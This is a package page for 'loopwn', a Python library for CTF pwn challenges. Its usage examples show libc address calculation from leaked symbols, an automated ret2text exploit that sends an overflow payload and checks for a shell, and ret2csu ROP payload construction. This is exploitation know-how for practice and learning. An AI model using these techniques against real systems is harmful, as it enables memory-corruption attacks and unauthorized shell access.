A CTF pwn helper library for easy libc address calculation and exploitation
Project description
loopwn
A Python library designed to assist with CTF Pwn challenges, specifically focusing on Libc address calculation and leak exploitation.
Installation
pip install loopwn
Usage
1. Looplibc - Libc Address Calculation
from loopwn import Looplibc
# Example 1: Initialize with a known base address
libc = Looplibc('./libc.so.6', 0x7ffff7a0d000)
# Example 2: Initialize with a leaked symbol address
# This will automatically calculate the base address
libc = Looplibc('./libc.so.6', 'puts', 0x7ffff7a8c5a0)
# Access addresses
print(hex(libc.system))
print(hex(libc.bin_sh))
2. loop2text - Auto Ret2text Exploitation
from pwn import *
from loopwn import loop2text
# Start process
io = process('./pwn')
# Exploit
# Automatically sends payload and verifies shell with an echo check
# Args: padding_length, backdoor_address, io_object
loop2text(112, 0x401186, io)
3. loopcsu - Auto Ret2CSU Payload Generation
from loopwn import loopcsu
# Gadget addresses (Usually found in __libc_csu_init)
# csu_end: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
# csu_start: mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
csu_end = 0x4011da
csu_start = 0x4011c0
# Generate payload
# Args: csu_end, csu_start, r12, r13, r14, r15, return_addr, padding=0
payload = loopcsu(
csu_end, csu_start,
r12=0x601018, # Function pointer (e.g., GOT address)
r13=0, # Arg1 (EDI)
r14=1, # Arg2 (RSI)
r15=2, # Arg3 (RDX)
return_addr=0x401120,
padding=0x20
)
# Send payload
io.sendline(payload)
Features
- Automatic Base Calculation: Easily calculate libc base address from a leaked symbol.
- Quick Access: Get
systemand/bin/shaddresses via properties. - Auto Ret2Text: Generate payload and get shell in one line with
loop2text. - Auto Ret2CSU: Simplify Ret2CSU payload construction with
loopcsu. - Shell Verification: Automatically checks if shell is obtained.
- Pwntools Integration: Inherits from
pwntools'sELFclass.
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
loopwn-0.3.7.tar.gz
(8.0 kB
view details)
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file loopwn-0.3.7.tar.gz.
File metadata
- Download URL: loopwn-0.3.7.tar.gz
- Upload date:
- Size: 8.0 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.13.9
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
643520a509376a188f68a6b5b01516b3c7bb1dcd80e7cf383941f8ce4d29ba04
|
|
| MD5 |
376dfafdfe185de13a8354ecd153803b
|
|
| BLAKE2b-256 |
27a8eeab5f5b2c72e57d3af9e1dbe0f00c4383936272963b80ecdd60159a1d1e
|
File details
Details for the file loopwn-0.3.7-py3-none-any.whl.
File metadata
- Download URL: loopwn-0.3.7-py3-none-any.whl
- Upload date:
- Size: 8.9 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.13.9
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
21ea1b85663ba518ffaabffe8dfb27ccd9bc4f4b462fdd36edbb4d6625af22ad
|
|
| MD5 |
c594b391513377e17c252edf12273c47
|
|
| BLAKE2b-256 |
8c4685a7a596df979c98c2b1f12dc703d3637420fb9ecfe3b1b58d182d81ef5a
|
